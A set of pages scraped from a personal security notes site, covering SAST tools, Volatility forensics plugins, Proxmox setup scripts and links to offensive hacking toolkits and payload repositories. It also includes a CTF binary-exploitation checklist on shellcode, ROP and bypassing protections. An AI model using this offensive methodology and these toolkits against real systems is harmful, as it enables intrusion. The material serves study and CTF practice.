Reviews](https://martian1337.gitbook.io/notes/notes/certifications/csslp/domain-5-secure-software-implementation#code-and-peer-reviews) * [Common Vulnerabilities and Controls](https://martian1337.gitbook.io/notes/notes/certifications/csslp/domain-5-secure-software-implementation#common-vulnerabilities-and-controls) * [Vulnerabilities](https://martian1337.gitbook.io/notes/notes/certifications/csslp/domain-5-secure-software-implementation#vulnerabilities) * [Controls](https://martian1337.gitbook.io/notes/notes/certifications/csslp/domain-5-secure-software-implementation#controls) --- # Tools | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca/static-code-analysis.md) . [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca/static-code-analysis#sast) SAST ------------------------------------------------------------------------------------------------------------------------ Static code review tools working with source code and looking for known patterns and relationships of methods, variables, classes and libraries. SAST works with the raw code and usually not with build packages. Name Description [**Brakeman**](https://github.com/presidentbeef/brakeman) Brakeman is a static analysis tool which checks Ruby on Rails applications for security vulnerabilities [**Semgrep**](https://semgrep.dev/) Hi-Quality Open source, works on 17+ languages [**Bandit**](https://github.com/PyCQA/bandit) Python specific SAST tool [**libsast**](https://github.com/ajinabraham/libsast) Generic SAST for Security Engineers. Powered by regex based pattern matcher and semantic aware semgrep [**ESLint**](https://eslint.org/) Find and fix problems in your JavaScript code [**nodejsscan**](https://github.com/ajinabraham/nodejsscan) NodeJs SAST scanner with GUI [**FindSecurityBugs**](https://find-sec-bugs.github.io/) The SpotBugs plugin for security audits of Java web applications [**SonarQube community**](https://github.com/SonarSource/sonarqube) Detect security issues in code review with Static Application Security Testing (SAST) [**gosec**](https://github.com/securego/gosec) Inspects source code for security problems by scanning the Go AST. [**Safety**](https://github.com/pyupio/safety) Checks Python dependencies for known security vulnerabilities . **Note:** Semgrep is free CLI tool, however some rulesets ([https://semgrep.dev/r](https://semgrep.dev/r) ) are having various licences, some can be free to use and can be commercial. OWASP curated list of SAST tools : [https://owasp.org/www-community/Source\_Code\_Analysis\_Tools](https://owasp.org/www-community/Source_Code_Analysis_Tools) **Install semgrep (**[**SonarQube**](https://docs.sonarqube.org/latest/analyzing-source-code/overview/) **alternative):** [semgrep](https://semgrep.dev/docs/getting-started/) - static source code analyzer which works on over 25 languages Install: `python3 -m pip install semgrep` Add to path in zsh: `path+=('/home/kali/.local/bin') export PATH` Analyze code: `semgrep --config auto badcode.php` [PreviousJava Security 101](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca/java-security-101) [NextCodeQL for Beginners](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca/codeql-for-beginners) Last updated 1 year ago --- # Volatility | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/defensive-security/forensics/volatility.md) . [](https://martian1337.gitbook.io/notes/notes/defensive-security/forensics/volatility#general) General ----------------------------------------------------------------------------------------------------------- Examples of volatility command • `python vol.py -f [filepath] windows.info.Info > [pathtosaveresult.txt]` Shows OS & kernel details of the memory sample being analysed. • `python vol.py -f [filepath] windows.pstree.PsTree > [pathtosaveresult.txt]` Shows Plugin for listing processes in a tree based on their parent process ID. • `python vol.py -f [filepath] windows.netscan.NetScan > [pathtosaveresult.txt]` Shows Scans for network objects present in a particular windows memory image. • `python vol.py -f [filepath] windows.pslist.PsList > [pathtosaveresult.txt]` Lists the processes present in a particular windows memory image. • `python vol.py -f [filepath] windows.dlllist.DllList > [pathtosaveresult.txt]` Lists the loaded modules in a particular windows memory image. • `python vol.py -f [filepath] windows.netstat.NetStat > [pathtosaveresult.txt]` Shows traverses network tracking structures present in a particular windows memory image. Description Command Runs the automagics and both prints and outputs configuration in the output directory. configwriter.Configwriter Plugin to list the various modular components of Volatility frameworkinfo.FrameworkInfo Determines information about the currently available ISF files, or a specific one isfinfo.IsfInfo Runs the automagics and writes out the primary layer produced by the stacker. layerwriter.Layerwriter Runs all relevant plugins that provide time related information and orders the results by time. Timeliner.Timeliner [](https://martian1337.gitbook.io/notes/notes/defensive-security/forensics/volatility#linux) Linux ------------------------------------------------------------------------------------------------------- Description Command Attempts to identify potential linux banners in an image banners.Banners Determines information about the currently available ISF files, or a specific one isfinfo.IsfInfo Runs the automagics and writes out the primary layer produced by the stacker layerwriter.Layerwriter Recovers bash command history from memory linux.bash.Bash Verifies the operation function pointers of network protocols. linux.check\_afinfo.Check\_afinfo Checks if any processes are sharing credential structures linux.check\_creds.Check.\_creds Checks if the IDT has been altered linux.check\_idt.Check\_idt Compares module list to sysfs info, if available linux.check\_modules.Check\_modules Check system call table for hooks. linux.check\_syscall.Check\_syscall Lists all memory mapped ELF files for all processes. linux.elfs.Elfs Lists processes with their environment variables linux.envars.Envars linux.enwvars.Enwvars Generates an output similar to /proc/iomem on a running system. linux.iomem.IOMem Parses the keyboard notifier call chain linux.keyboard\_notifiers.Keyboard\_notifiers Kernel log buffer reader linux.kmsg.Kmsg Lists loaded kernel modules linux.Ismod.Lsmod Lists all memory maps for all processes. linux.lsof.Lsof Lists process memory ranges that potentially contain injected code. linux.malfind.Malfind Lists mount points on processes mount namespaces linux.mountinfo.MountInfo Lists all memory maps for all processes. linux.proc.Maps Lists processes with their command line arguments linux.psaux.PsAux Lists the processes present in a particular linux memory image. linux.pslist.PsList Scans for processes present in a particular linux image. linux.psscan.PsScan Plugin for listing processes in a tree based on their parent process ID. linux.pstree.PsTree Lists all network connections for all processes. linux.sockstat.Sockstat Checks tty devices for hooks linux.tty\_check.tty\_check [](https://martian1337.gitbook.io/notes/notes/defensive-security/forensics/volatility#mac) Mac --------------------------------------------------------------------------------------------------- Description Command Recovers bash command history from memory. mac.bash.Bash Check system call table for hooks. mac.check\_Syscall.Check\_Syscall Check sysctl handlers for hooks. mac.check\_sysctl.Check\_sysctl Check mac trap table for hooks. mac.check\_trap\_table.Check\_trap\_table Lists network interface information for all devices Lists network interface information for all devices Lists kauth listeners and their status mac. kauth\_listeners.Kauth\_listeners Lists kauth scopes and their status mac. kauth\_scopes.Kauth.scopes Lists event handlers registered by processes mac.kevents.Kevents Lists all open file descriptors for all processes. mac.list\_files.List\_Files Lists loaded kernel modules mac.lsmod.Lsmod Lists all open file descriptors for all processes. mac.lsof.Lsof Lists process memory ranges that potentially contain injected code. mac.malfind.Malfind A module containing a collection of plugins that produce data typically found in Mac’s mount command mac.mount.Mount Lists all network connections for all processes mac.netstat.Netsta Lists process memory ranges that potentially contain injected code mac.proc\_maps.Maps Recovers program command line arguments. mac.psaux.Psaux Lists the processes present in a particular mac memory image mac.pslist.PsList Plugin for listing processes in a tree based on their parent process ID. mac.pstree.Pstree Enumerates kernel socket filters mac.socket\_filters.Socket\_filters Check for malicious kernel timers. mac.timers.Timers Checks for malicious trustedbsd modules mac.trustedbsd.Trustedbsd Lists processes that are filtering file system events mac.ufsevents.VFSevents [](https://martian1337.gitbook.io/notes/notes/defensive-security/forensics/volatility#windows) Windows ----------------------------------------------------------------------------------------------------------- Description Command List big page pools. windows.bigpools.BigPools Lists kernel callbacks and notification routines. windows.callbacks.Callbacks Lists process command line arguments. windows.cmdline.CmdLine Lists the information from a Windows crash dump. windows.crashinfo.Crashinfo Listing tree based on drivers and attached devices in a particular windows memory image. windows.devicetree.DeviceTree Lists the loaded modules in a particular windows memory image. windows.dillist.DIlList List IRPs for drivers in a particular windows memory image. windows.driverirp.DriverIrp Determines if any loaded drivers were hidden by a rootkit windows.drivermodule.DriverModule Scans for drivers present in a particular windows memory image. windows.driverscan.DriverScan Dumps cached file contents from Windows memory samples. windows.dumpfiles.DumpFiles Display process environment variables windows.envars.Envars Lists process token sids. windows.getservicesids.GetServiceSIDs Print the SIDs owning each process windows.getsids.GetSIDs Lists process open handles. windows.handles.Handles Show OS & kernel details of the memory sample being analyzed. windows.info.Info Print process job link information windows.joblinks.Joblinks Lists the loaded modules in a particular windows memory image. windows.ldrmodules.LdrModules Lists process memory ranges that potentially contain injected code. windows.malfind.Malfind Scans for and parses potential Master Boot Records (MBRs) windows.mbrscan.MBRScan Prints the memory map windows.memmap.Memmap Scans for modules present in a particular windows memory image. windows.modscan.Modscan Lists the loaded kernel modules. windows.modules.Modules Scans for mutexes present in a particular windows memory image. windows.mutantscan.MutantScan Scans for network objects present in a particular windows memory image. windows.netscan.Netscan Traverses network tracking structures present in a particular windows memory image. windows.netstat.NetStat A generic pool scanner plugin. windows.poolscanner.Poolscanner Lists process token privileges windows.privileges.Privs Lists the processes present in a particular windows memory image. windows.pslist.PsList Scans for processes present in a particular windows memory image. windows.psscan.Psscan Plugin for listing processes in a tree based on their parent process ID. windows.pstree.PsTree Lists the certificates in the registry's Certificate Store. windows.registry.certificates.Certificates Lists the registry hives present in a particular memory image. windows.registry.hivelist.Hivelist Scans for registry hives present in a particular windows memory image. windows.registry.hivescan.Hivescan Lists the registry keys under a hive or specific key value. windows.registry printkey.PrintKey Print userassist registry keys and information. windows.registry.userassist.UserAssist lists Processes with Session information extracted from Environmental Variables windows.sessions.Sessions Looks for signs of Skeleton Key malware windows.skeleton\_key\_check.Skeleton\_Key\_Check Lists the system call table. windows.ssdt.SSDT Lists statistics about the memory space. windows.statistics.Statistics Reads output from the strings command and indicates which process(es) each string belongs to. windows.strings.Strings Scans for links present in a particular windows memory image. windows.symlinkscan.Symlinkscan Lists process memory ranges. windows.vadinfo.VadInfo Walk the VAD tree. windows.wadwalk.Vadwalk Lists version information from PE files. windows.verinfo.VerInfo Lists virtual mapped sections. windows.wirtmap.VirtMap [PreviousForensics](https://martian1337.gitbook.io/notes/notes/defensive-security/forensics) [NextWireShark filters](https://martian1337.gitbook.io/notes/notes/defensive-security/wireshark-filters) Last updated 1 year ago * [General](https://martian1337.gitbook.io/notes/notes/defensive-security/forensics/volatility#general) * [Linux](https://martian1337.gitbook.io/notes/notes/defensive-security/forensics/volatility#linux) * [Mac](https://martian1337.gitbook.io/notes/notes/defensive-security/forensics/volatility#mac) * [Windows](https://martian1337.gitbook.io/notes/notes/defensive-security/forensics/volatility#windows) --- # Blockchain | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/resources/offensive-cybersecurity/blockchain.md) . [Awesome Smart Contract Security from @saeidshirazi](https://github.com/saeidshirazi/Awesome-Smart-Contract-Security) [Damn Vulnerable DeFi practice](https://www.damnvulnerabledefi.xyz/) [Rareskills.io Smart Contract Security Guide](https://www.rareskills.io/post/smart-contract-security) [PreviousContainer Security](https://martian1337.gitbook.io/notes/resources/offensive-cybersecurity/container-security) [NextLLM Pentesting](https://martian1337.gitbook.io/notes/resources/offensive-cybersecurity/llm-pentesting) Last updated 6 months ago --- # General | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/resources/offensive-cybersecurity/general.md) . [AthenaOS - Arch-linux Cybersecurity OS](https://github.com/Athena-OS/athena-iso#install) ! [HackTricks](https://book.hacktricks.xyz/) ! [Exploit Notes](https://exploit-notes.hdks.org/) ! [Nahamsec's beginner repo](https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters) [PayloadsAllTheThings Repo](https://github.com/swisskyrepo/PayloadsAllTheThings) ! [Z4nzu's Hacking Tool](https://github.com/Z4nzu/hackingtool) [CTF Resources from @Crypto-Cat](https://github.com/Crypto-Cat/CTF) [Awesome Pentest Tools/references from @enaqx](https://github.com/enaqx/awesome-pentest) [Dark Army Hacking Tools](https://github.com/D4RK-4RMY/DARKARMY) [Pimp My Kali](https://github.com/Dewalt-arch/pimpmykali) [Online Hash Cracking Service](https://crackstation.net/) ! [fsociety Hacking Tools](https://github.com/Manisso/fsociety) [Payloadbox Repository](https://github.com/payloadbox) ! [Awesome Android Security](https://github.com/saeidshirazi/awesome-android-security) ! [Bug Bounty Tips](https://github.com/KingOfBugbounty/KingOfBugBountyTips) [Lockdoor Framework Pentesting Tool](https://github.com/SofianeHamlaoui/Lockdoor-Framework) [Penetration Testing Execution Standard Guide](http://www.pentest-standard.org/index.php/Main_Page) ! [CyberChef Recipes Repo](https://github.com/mattnotmax/cyberchef-recipes) [Red Teaming Cheat Sheet Repo from @0xjs](https://github.com/0xJs/RedTeaming_CheatSheet) [Cobra All-in-one Tool](https://github.com/ManasHarsh/Cobra) [SANS SLingshot Tool](https://www.sans.org/tools/slingshot/) [Pentest Reporting Tool from @micro-joan](https://github.com/micro-joan/BlackStone) [s0cm0nkey's guide](https://s0cm0nkey.gitbook.io/s0cm0nkeys-security-reference-guide/) ! [Six2dez's Pentest Book](https://pentestbook.six2dez.com/) ! [sl4xo's Blog](https://sl4x0.github.io/) [thehacker.recipes](https://www.thehacker.recipes/) [Red Team Notes](https://www.ired.team/) [PreviousOffensive](https://martian1337.gitbook.io/notes/resources/offensive-cybersecurity) [NextInfrastructure Pentesting](https://martian1337.gitbook.io/notes/resources/offensive-cybersecurity/infrastructure-pentesting) Last updated 3 months ago --- # Proxmox VE | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve.md) . [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve#proxmox-install) Proxmox Install --------------------------------------------------------------------------------------------------------------------- 1. Get the latest ISO image from [https://proxmox.com/en/downloads](https://proxmox.com/en/downloads) 2. Use Balena Etcher (Linux) or Rufus(Windows) to flash on to Bootable USB 3. Boot into Proxmox Installer 4. Log in to router and get the DHCP information 1. Make a note of the addressable range in your current config. If the last address is .254, this needs to be adjusted to limit the space available so the next static IP can be assigned to Proxmox device 2. In this test enviroment, the router is limited the scope from `.2` to `.100` for other devices in the network so that proxmox can use `.101` ![](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2F2615529102-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F997kcgdjxml4NiriygeG%252Fuploads%252FVEOIus7rP4TgNfEXl5dD%252FDHCP.png%3Falt%3Dmedia%26token%3D3c90c057-aad8-4370-afd3-8ddc9ecf3556&width=768&dpr=3&quality=100&sign=84b67269&sv=2) 5. Configure the next available or desired Static IP for Proxmox during installation process 6. Configure the DNS IP to the local DNS router or a preferred public DNS 1. In this test case, The local IP address of the router on the same network was used as DNS 7. Make a note of the local IP address and port number provided after installation is complete (usually port 8006 on IP configured) [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve#post-install-configs) Post-Install Configs ------------------------------------------------------------------------------------------------------------------------------- ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve#helper-script) Helper Script 1. Login to the Proxmox Web UI using the password configured during OS installation 2. Click the node in the datacenter section of the server view. The default is PVE unless renamed during install 3. In the node menu, select shell 1. ![](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2F2615529102-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F997kcgdjxml4NiriygeG%252Fuploads%252F1bzBz5HblnErGgmjqWp8%252Fshell.png%3Falt%3Dmedia%26token%3D81754842-3d45-4c81-8b6e-2a9feb0e52c2&width=768&dpr=3&quality=100&sign=db108b5a&sv=2) 1. Run the below command for a good header response to ensure that Proxmox is connected to the internet and a working DNS is confirgured properly: 1. If your DNS queries are not working feel free to modify your resolve.conf file within proxmox shell with similar command as below 2. In the browser of the remote connected device, visit [https://community-scripts.github.io/ProxmoxVE/](https://community-scripts.github.io/ProxmoxVE/) and locate the Post-Install helper script for Proxmox 3. ![](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2F2615529102-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F997kcgdjxml4NiriygeG%252Fuploads%252FyW1CZfUH4nCNEom1q34p%252Fhelperscripts.png%3Falt%3Dmedia%26token%3Daea573bb-3bfb-4f54-ae54-228bfc8e71bb&width=768&dpr=3&quality=100&sign=7f042afb&sv=2) 1. Copy the command and paste into Proxmox Shell 1. Description from the helper scripts project - "This script provides options for managing Proxmox VE repositories, including disabling the Enterprise Repo, adding or correcting PVE sources, enabling the No-Subscription Repo, adding the test Repo, disabling the subscription nag, updating Proxmox VE, and rebooting the system." ![](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2F2615529102-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F997kcgdjxml4NiriygeG%252Fuploads%252FTyMXQQUNkuVnQZMOu10o%252Fshellcommand.png%3Falt%3Dmedia%26token%3Ddd50303e-7489-470e-b5df-41dc83a96995&width=768&dpr=3&quality=100&sign=570fed4d&sv=2) 1. Type `y` to start the installation process 2. If you are not using Enterprise, Corosync, etc ensure to ponly enable the `No-Subscription` repo during installation ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve#installing-vm-isos) Installing VM ISOs #### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve#install-via-url) Install via URL 1. Visit the website with the desired OS and locate the specific dowload link. 2. Right-click the link and copy the raw download URL address 1. ![](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2F2615529102-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F997kcgdjxml4NiriygeG%252Fuploads%252FOHrSqJXXq49iE6ZiMptc%252Fathenalink.png%3Falt%3Dmedia%26token%3D7c99044f-6315-4dd4-a9c5-52b52f80fa87&width=768&dpr=3&quality=100&sign=b5658ba&sv=2) 1. Click the local storage for the desired node 2. In the storage menu click the `ISO images` tab and then download from URL 3. Paste the Download URL in the Download from URL window 1. Select `Query URL` to ensure the download will resolve successfully with correct ISO. ![](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2F2615529102-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F997kcgdjxml4NiriygeG%252Fuploads%252FF0ynkHKLJAYUksshiGP5%252FdownloadURL.png%3Falt%3Dmedia%26token%3D593f5388-24bf-4088-8992-99b534ca6d11&width=768&dpr=3&quality=100&sign=e5cc88c0&sv=2) 2. Download button will not work if this is not correct. ![](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2F2615529102-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F997kcgdjxml4NiriygeG%252Fuploads%252FM2bA04Nbw7cCW8VfrHgw%252Fquery.png%3Falt%3Dmedia%26token%3Dd0e1177d-94ae-4c25-880f-1223f6212235&width=768&dpr=3&quality=100&sign=cab0a8b6&sv=2) 1. Start the Download and monitor for `Task OK` status at bottom of window 1. ![](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2F2615529102-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F997kcgdjxml4NiriygeG%252Fuploads%252FKdbDGXCLDWrP5e7GN7P3%252Fdownload.png%3Falt%3Dmedia%26token%3De4668500-18fb-454d-9a1b-83b7b871d5a7&width=768&dpr=3&quality=100&sign=bf516f4a&sv=2) 1. Close the window and view the installed ISO file [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve#enable-nested-virtualization) Enable Nested Virtualization ----------------------------------------------------------------------------------------------------------------------------------------------- The below one-liner script works as follows: 1. **Detect CPU Vendor:** It uses the `lscpu` command to check if the CPU is Intel (`GenuineIntel`) or AMD (`AuthenticAMD`). 2. **Configure Nested Virtualization:** * For Intel CPUs, it writes the line `options kvm-intel nested=Y` to `/etc/modprobe.d/kvm-intel.conf` to enable nested virtualization. * For AMD CPUs, it writes `options kvm-amd nested=1` to `/etc/modprobe.d/kvm-amd.conf` for the same purpose. 3. **Reload KVM Kernel Module:** To apply changes immediately without reboot, the script unloads (`modprobe -r`) and reloads (`modprobe`) the respective kernel module: * `kvm_intel` for Intel CPUs * `kvm_amd` for AMD CPUs 4. **Print Confirmation:** After reloading, it prints a label ("Intel Nested:" or "AMD Nested:") followed by the current state of the nested virtualization parameter by reading: * `/sys/module/kvm_intel/parameters/nested` for Intel * `/sys/module/kvm_amd/parameters/nested` for AMD 5. **Fallback for Unsupported CPUs:** If the CPU is neither Intel nor AMD, it outputs "Unsupported CPU" to notify the user. The script essentially automates the manual process of enabling nested virtualization on a Proxmox host, avoiding reboot by reloading the kernel modules, and immediately shows whether the feature is enabled (expecting a `Y` or `1`). This makes it easier and faster to set up nested virtualization in Proxmox environments using either Intel or AMD processors. ENSURE THAT ALL VMs ARE STOPPED or you will receive this error based on your CPU : `modprobe: FATAL: Module kvm_intel is in use.` [PreviousSelf-Hosting](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting) [NextProxmox Update Setup Guide](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/proxmox-update-setup-guide) Last updated 10 months ago * [Proxmox Install](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve#proxmox-install) * [Post-Install Configs](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve#post-install-configs) * [Helper Script](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve#helper-script) * [Installing VM ISOs](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve#installing-vm-isos) * [Enable Nested Virtualization](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve#enable-nested-virtualization) Copy curl -I https://raw.githubusercontent.com Copy echo "nameserver 194.242.2.4" > /etc/resolv.conf Copy if [[ $(lscpu | grep -o 'GenuineIntel') ]]; then echo "options kvm-intel nested=Y" > /etc/modprobe.d/kvm-intel.conf && modprobe -r kvm_intel && modprobe kvm_intel && echo -n "Intel Nested: " && cat /sys/module/kvm_intel/parameters/nested; elif [[ $(lscpu | grep -o 'AuthenticAMD') ]]; then echo "options kvm-amd nested=1" > /etc/modprobe.d/kvm-amd.conf && modprobe -r kvm_amd && modprobe kvm_amd && echo -n "AMD Nested: " && cat /sys/module/kvm_amd/parameters/nested; else echo "Unsupported CPU"; fi --- # Binary Exploitation | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/binary-exploitation.md) . ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/binary-exploitation#environment-setup) **Environment Setup:** * Prepare a safe testing environment, ideally a virtual machine. * Install necessary tools like GDB, PEDA/GEF, pwntools, Binary Ninja, IDA Pro, radare2, etc. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/binary-exploitation#binary-analysis) **Binary Analysis:** * Run `file` command to determine the binary type (e.g., ELF, PE). * Check for binary protections (ASLR, NX, PIE, etc.) using `checksec` or a similar tool. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/binary-exploitation#initial-exploration) **Initial Exploration:** * Execute the binary to understand its basic functionality and any obvious flaws. * Check for inputs, arguments, and environment variables that it uses. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/binary-exploitation#static-analysis) **Static Analysis:** * Disassemble or decompile the binary using tools like IDA Pro, Ghidra, or radare2. * Look for functions, system calls, and potential vulnerabilities (e.g., buffer overflows, format string vulnerabilities). * For C/C++ Check for all instances of memcpy **Dynamic Analysis:** * Debug the binary using GDB or a similar debugger. * Set breakpoints at critical functions and analyze the program's execution flow. * Monitor stack, registers, and memory allocations during execution. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/binary-exploitation#fuzzing) **Fuzzing:** * Use fuzzing tools like AFL or Radamsa to automatically generate inputs and uncover crashes. * Analyze crash outputs for potential exploitability. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/binary-exploitation#exploit-development) **Exploit Development:** * Develop an exploit for the identified vulnerability. * For buffer overflows, calculate offsets, control EIP/RIP, and possibly leverage shellcode. * For format string vulnerabilities, write payloads to read from or write to memory. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/binary-exploitation#bypassing-protections) **Bypassing Protections:** * Develop strategies to bypass protections like ASLR, NX, or stack canaries. * Use Return Oriented Programming (ROP), Jump Oriented Programming (JOP), or similar techniques if necessary. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/binary-exploitation#shellcode-crafting) **Shellcode Crafting:** * If the exploit allows arbitrary code execution, craft or modify shellcode accordingly. * Ensure compatibility with the target binary's architecture (x86, x86\_64, ARM, etc.). ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/binary-exploitation#testing-and-debugging) **Testing and Debugging:** * Test the exploit in different environments and scenarios. * Debug any issues that arise and refine the exploit. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/binary-exploitation#automation) **Automation:** * Script the exploit using tools like pwntools for ease of use and reproducibility. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/binary-exploitation#post-exploitation) **Post-Exploitation:** * Once exploitation is successful, perform actions as required by the CTF challenge (e.g., reading a flag file). ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/binary-exploitation#documentation-if-applicable) **Documentation (if applicable):** * Document the exploit process, including how the vulnerability was discovered and exploited. ### [](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/binary-exploitation#cleanup) **Cleanup:** * After completing the challenge, clean up the environment and remove any temporary files or payloads. [PreviousForensics Checklist](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/forensics-checklist) [NextCryptography Checklist](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/cryptography-checklist) Last updated 6 months ago * [Environment Setup:](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/binary-exploitation#environment-setup) * [Binary Analysis:](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/binary-exploitation#binary-analysis) * [Initial Exploration:](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/binary-exploitation#initial-exploration) * [Static Analysis:](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/binary-exploitation#static-analysis) * [Fuzzing:](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/binary-exploitation#fuzzing) * [Exploit Development:](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/binary-exploitation#exploit-development) * [Bypassing Protections:](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/binary-exploitation#bypassing-protections) * [Shellcode Crafting:](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/binary-exploitation#shellcode-crafting) * [Testing and Debugging:](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/binary-exploitation#testing-and-debugging) * [Automation:](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/binary-exploitation#automation) * [Post-Exploitation:](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/binary-exploitation#post-exploitation) * [Documentation (if applicable):](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/binary-exploitation#documentation-if-applicable) * [Cleanup:](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/binary-exploitation#cleanup) --- # Idle Proxmox Auto-Shutdown | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/idle-proxmox-auto-shutdown.md) . ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/idle-proxmox-auto-shutdown#id-1.-create-the-script) 1\. Create the Script Open the shell of your Proxmox server (via SSH or web UI) and create the script file: Copy nano /root/shutdown.sh Paste the following content into the file: Copy #!/bin/bash # Check all VMs for running status VM_RUNNING=$(qm list | grep -c 'running') # Check all containers for running status CT_RUNNING=$(pct list | awk '$3 == "running" {print $1}' | wc -l) # If neither VMs nor containers are running, power off if [[ "$VM_RUNNING" -eq 0 && "$CT_RUNNING" -eq 0 ]]; then poweroff fi Save and exit (in nano, press `CTRL+O` then `Enter`, then `CTRL+X`). Make the script executable: Copy chmod +x /root/shutdown.sh * * * ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/idle-proxmox-auto-shutdown#id-2.-add-cron-job) 2\. Add Cron Job Edit the root user's crontab: Add the following line at the end of the file to execute the script every 3 hours: Save and exit the editor. * * * ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/idle-proxmox-auto-shutdown#id-3.-verify-and-test) 3\. Verify & Test * Your script will now be checked every 3 hours. * If there are no running VMs or containers, the server will power off safely. * You do not need to restart the cron service after editing as Proxmox picks up changes automatically. * Ensure the script path and permissions are correct. [PreviousRemotely Unlocking LUKS-Encrypted Proxmox with Dropbear SSH at 